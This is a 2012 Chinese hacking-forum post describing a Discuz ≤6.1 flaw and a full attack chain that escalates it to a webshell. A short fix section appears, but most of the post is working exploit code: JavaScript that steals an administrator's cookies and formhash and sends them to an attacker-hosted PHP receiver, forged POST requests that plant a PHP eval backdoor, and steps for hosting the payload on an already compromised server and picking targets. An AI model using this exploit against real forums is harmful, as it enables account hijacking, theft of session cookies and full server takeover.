找回密码
 立即注册
查看: 4228|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell* T# f: r, ?& ~' C2 ?. D; P
By racle @tian6.com
4 x9 Q1 Q" S! ~( \$ o欢迎转帖.但请保留版权信息.
4 B5 p3 W; W& z- ^受影响版本iscuz<=6.1.0,gbk+utf+big53 p. G- N0 X, d' m& d8 L# l  p
' |0 r- M3 W# W
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.9 h& V, f# o+ y
' _( n5 ~- [# _9 e: [4 G3 f, a
1 r1 F( N! r! x6 Q( @( G* U
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
: A4 o( @  Z; d$ C0 z! S' }当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
( A  ]- z7 C) H4 v1 j8 P1 E! [
5 \8 h* v% |. R) p& |' \分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
5 v8 P2 n4 q6 k7 _6 A" z本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS: C" v4 s) h8 `3 K, e" [
) ^  ]( d- m( z0 K5 J
! v, R$ ~" r: ]# @' A* `+ i# @
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
  Y* I& t: ~# e+ T8 v1 N3 l* F

$ v' x& `, e$ I) v* Xproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
! _4 {# Z) {9 Q7 ?* o, Z* |
6 R/ D$ b5 Q5 h4 U, s1 \8 Q( @problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.7 r! T% i' t$ h  B

: p( b$ K+ `# |: }, Q3 Gproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
6 z0 k2 q" y! V! c+ Y7 F* U
* H6 x0 `: [6 \  u
5 D0 O+ ?, |% C8 V) R下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
3 w: u0 E5 D/ m
3 S" O0 o; c' y5 s" u9 w        global $runwizardfile, $runwizardhistory;
5 D/ C9 R1 ~9 ]" j% Z. g
- L: @4 d& N5 i% h8 C        $fp = fopen($runwizardfile, 'w');
  [  s" b# V4 d) P5 p7 k
1 j4 _5 G5 L6 m& \# h        fwrite($fp, serialize($runwizardhistory));
7 V# J8 c' b; W; w
, Q2 Y  P8 ?& m! r: u7 |+ N        fclose($fp);/ ?% G: F, R6 b! {% x# S
) ?: N# a. Y! N1 r( k' N
}/ ?0 Y# p5 L* E, V- U
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.; h9 W' w8 g; g1 q. k' M
以下是修补的办法:function saverunwizardhistory() {5 Z7 V1 S/ _+ @

. `1 [, s" c/ u4 E        global $runwizardfile, $runwizardhistory;0 E, k8 s1 Q% a2 a! k

8 T" _- ?3 Y9 Y; l        $fp = fopen($runwizardfile, 'w');9 ^' n5 T' E, x  r2 s: f
4 J- n2 A% u3 H6 T4 R
        $s = '<?php exit;?>';( R. \9 Q( W/ X  p
' [# S& t+ R1 L
        $s .= serialize($runwizardhistory);
. q. I6 j3 O  R* e8 b; p4 }3 i; F9 S. m4 ?" y' O! n
        fwrite($fp, $s);
1 c: @* B# s' _. X" X+ p; C+ I8 h0 O* ]
        fclose($fp);
* J& `0 |- Q" L
$ {7 @5 K! v7 a' H7 u7 J}
" B" i  B# u& Y  _1 a复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
$ u# m  p" P5 X( o5 {1 W
+ P! S& X2 F! \) F" W% e0 G) [' d+ i3 y6 U8 V7 \
" q! j( ]- {! M( y: V
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------* h5 q$ E1 o/ S" M% E' p' y

2 o$ h6 B& z! Z/ }* A) h# f9 A3 ]4 T" ^1 |2 P
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.+ T: D, n: }. R! ?  g$ N
7 ]. V1 |' ]" b. v# @2 P2 {$ @0 m2 w5 V
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
) d$ K( A- o& h) C% S. u' Q% ^
: n# |. c) ^& t" O6 W+ a/ T6 J这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
( K$ n$ r" M6 [# _3 ^( h- D8 s( C
, x% |0 \+ W' a1 X首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
2 Y0 d% C& _8 v5 D. K8 k0 E4 W7 V$ w  F% c! I$ w0 v4 S/ P! h
var url="http://目标网站/admincp.php";      
! R6 A" A( l! ]1 L6 b$ H' O
# T" ?! Q1 ^+ e! L! b* w7 Y/*获得cookies*/8 d+ O- v6 c' j8 w

$ C  }3 B6 B; h8 V8 z+ X+ zfunction getURL(s) {) l! |# n  ~' U3 a! d" {

$ T; k" X1 w* ?  V. pvar image = new Image();3 k* J9 r! J& R3 Z) k7 t

  c  V5 j& q1 F' A+ D3 C3 O. C" Timage.style.width = 0;" |* g& O. y0 c7 U6 Q' A! h4 P& |

6 F8 Z6 c: U  V, |image.style.height = 0;4 J( D, I! o% z" k
: k. {: m  k: h+ R3 `
image.src = s;
' v5 w9 Y9 o% I$ `: V4 z6 B3 }  U8 d% o8 m+ J2 N. c
}, H! K/ i. j! R2 v
. }' g( Q  b) b" u+ U( _5 Q# S
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php6 R! u  A- s$ {; u
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
) n" i8 T2 A; ~3 w0 j+ p1 Z2 {复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 2 K2 V8 f1 h4 Q. a! ^5 }  c

/ A' ]7 e7 o: U; o  F
- ]. v% _0 P: ?% C获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
, o* x6 N- T; J" y. p) Z9 l( y1 }0 P2 f; t" ~( W* m
! S! y' U" E8 ?
4 o* C. Y3 }% X& b- I' A
/*hash*/' B! Q- g7 f9 I& o% @9 \

/ Z& \8 g9 b. |; [; Fvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
$ n" T& Q6 p: E0 t9 h: @0 |& x, i. K; _1 c' X
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);% k7 c4 ^  N# H" M( d' ?
$ a0 k( j" |6 A. \0 A  M
xmlHttpReq.send();9 V& J' d; C1 e; H

% V& C8 k" Q" f9 Zvar resource = xmlHttpReq.responseText;
" G  \# o4 l; v6 f' C+ D( h7 R7 }; \" N' L% S' r1 g1 o
var numero = resource.search(/formhash/);+ C2 ]/ @% h3 z5 O
1 a+ R- M/ S9 K, V4 L
var formhash=encodeURIComponent(resource.substr(numero+17,8));2 T: L: A- q" Y- ]) m' o) b

$ c* }" o/ K7 K% Q9 |7 o) \; Z
1 i4 J! e. ~1 |7 w. L
8 @' l; h0 H2 \2 y6 lvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 1 ?8 t5 J" m* A* g0 C6 V- s. a( [

' V5 z7 b# i8 b9 I; \xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
- B" m8 s) e7 W6 U  D( c- Q$ s. H# X+ V! v4 E
xmlHttpReq.setRequestHeader("Referer", url);
1 g& @* o! Z5 ~1 D
' {7 }  ]8 P+ d" s: exmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");8 z: L& a9 K9 k; B

3 j3 W  W  j$ A1 K$ A" Y1 dxmlHttpReq.setrequestheader("content-length",post.length); 5 G( H3 b) @) n5 i; J, G/ f3 z+ _
: U" g# I7 ~# F0 }
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
' d% C# y6 k- Q$ a1 B6 B( c8 Q1 A( m" z3 w& H0 q
xmlHttpReq.send(post);//发送数据
7 d8 ^0 O$ d* W$ [# _- i; L复制代码这里HASH我假设正确,这样提交,也无须cookies
5 K- d7 e& A$ l& |( O9 |& S' ^
, ~9 s2 D. A1 n" B再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);/ I8 G3 G& v& P

2 e9 {) g3 g/ @if (!$sock) die("$errstr ($errno)\n");" O. R  e% s/ D: z- V
' P& _1 a: k4 o5 @. V. c( A. V
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
4 C1 ~# h. E$ ^- M- u5 g. a1 N) o
; Z( f& s  x7 m7 v' Z5 P5 n' z# U7 U  \8 E* n
7 X3 z( I$ G3 I8 S9 F" V2 U
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
- {) |/ P$ V2 T. c: ?+ d3 Z. T* H0 g& n8 }( d0 r7 L
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
8 w. O9 B/ ~9 M" ?2 L
7 j2 O3 h) h& Nfwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
( {8 B/ w+ A' ~9 w/ K3 Q3 S1 F  P( d, X3 N2 |$ z" Z
fwrite($sock, "Accept-Language: zh-cn\r\n");2 z1 X8 J4 K6 ~. f# H5 h, G

  C8 |: J3 h) y/ {7 w5 }  Hfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");  t% U+ Y; Z1 g4 u1 m/ T
' A/ D! g5 h# Z$ C3 A
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
: F3 x% G! b6 q0 B; V
% O: \1 v' d( Z. C" ~5 mfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
8 M% p% [; D$ A1 V
" N, f1 ^( Z8 U1 M- @) R: Q6 {fwrite($sock, "Host: $url\r\n");0 ^  ^4 A, h1 z; g0 @5 H# \, c
& F$ X9 o; g* Q+ O4 `! A  `+ S5 p
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");2 \7 j# N" Q2 u0 R) E$ }7 x8 V! j
2 B' ^" t1 g5 L
fwrite($sock, "Connection: Keep-Alive\r\n");  ?: _; K, g  R2 K% i% F8 I
8 f2 k% a9 v$ ^: k
fwrite($sock, "Cache-Control: no-cache\r\n");
4 G9 a! s+ Q: y. Q: t2 G" M5 a3 [+ i9 ^' Q# W: c! y1 j
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
, z' t. c' o/ Z) O7 ^
7 z5 ]$ S% R% G: |, k6 pfwrite($sock, $data);
) Q7 ^/ J: ~; z6 p9 ^4 B. A0 z! [5 X6 u4 f+ J7 M
& U" b( {# F& \- Y

. ^  I0 c/ e+ v: l$headers = "";2 Z) R% h  V3 R# m/ O8 y

# X+ d/ f6 f7 J# b1 Fwhile ($str = trim(fgets($sock, 4096))): Q; F2 S. r4 O& I
+ b6 Z) Z9 c( q
     $headers .= "$str\n";! p$ R3 F$ R# l" W; o
7 ^/ q8 i' ]4 n$ j% m" [/ J" W. Y
echo "\n";
# R& W8 d5 i% D' V: ]! O! Q! |
* }! J  }5 g- @+ c$body = "";6 k- r7 |% {- d9 }$ j

9 ^  \4 O& {" D# \while (!feof($sock))# T: v: [; J# ^. f; x& |7 v

7 U6 {# r4 `1 K4 c, m     $body .= fgets($sock, 4096);. {) S" m; ~3 B$ j6 C

# D3 Q3 y4 |/ w$ Qfclose($sock);9 j  l% k5 ?) w/ Y% B( {
, r- [7 n2 J" h( K
echo $body;& z+ O+ ?+ y& }: `
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
* z' ~4 C+ Q6 m) A
+ @6 d6 X- F8 j- j1 p' P  Q/ p0 j# a9 N. e
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------! c- H$ W* q' a! w6 L$ [* C

. e/ A! }" a5 \/ w) K
: n8 l: l9 a  T$ F( y1HP SOCKET利用方法首先打开racle.js
  l4 B: U: U6 I9 o
5 s. A1 h% z) S' {: B: bvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home. n/ R* z3 D* K

# ]) g' F" K! S+ n+ L2 |
) A8 H5 L! V! I2 A1 z5 X: E* {0 ~2 O8 G1 w1 n
然后打开racle@tian6.php" t, L6 s+ @8 J2 L

4 I9 H/ I  ~# L1 D4 C* O! G6 C$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
7 @6 p+ I& e1 F; E1 M
+ o5 M7 m$ H9 V# ?- y/ c5 i: A5 }5 G
- @" b! e0 |3 T% j- d4 x$ C% n  E! k6 ^" E8 v1 O0 Q
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
% h* W. ]7 o1 W' y1 ~" r  R" D4 N6 I; A2 X: p- q
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));: X" r5 M- _8 }! R- k
4 m- N/ X2 W* Z, a/ q1 O1 ^, _
8 \0 F! [' M8 c( ~8 z: o+ k. [

2 P, I5 s  B# O" i  D) T' a9 O" SgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
4 {: M& t. J: V复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.2 B% p! N7 c6 _, M' E
2 o& q1 ?: K* o. [; n& s. ?; n

7 n( p* k$ |6 g+ _- M, f, L
8 C0 O  y, K/ b4 I1 F如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:5 d0 H& h8 t2 k5 z3 M

6 s% A! Z% F# N* ?  Ivar formhash=encodeURIComponent(resource.substr(numero+17,8));# d5 ^9 q- K0 C$ y( F- ?

% D4 N+ ?& ~# U' W% {8 p4 t) p2 }
6 H% c4 X! Y& s/ ?7 T8 S
var formhash=encodeURIComponent(resource.substr(numero+9,8));. ?+ a) E2 G7 z8 O# L4 i
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.: z* X8 c$ U; o; N! Y7 b. p
' G6 `% F7 _$ S: ^
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
2 A  d$ x0 M# P* c. o( F9 B% r, ]4 ?! A
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.8 ]( {1 x* G7 b

3 |7 B1 U  _# |% }不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
; ?6 ?* Z* A/ u6 T. Q- ?. l
8 h8 U" {: P% [$ J- O3 {& ^* T9 e2 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表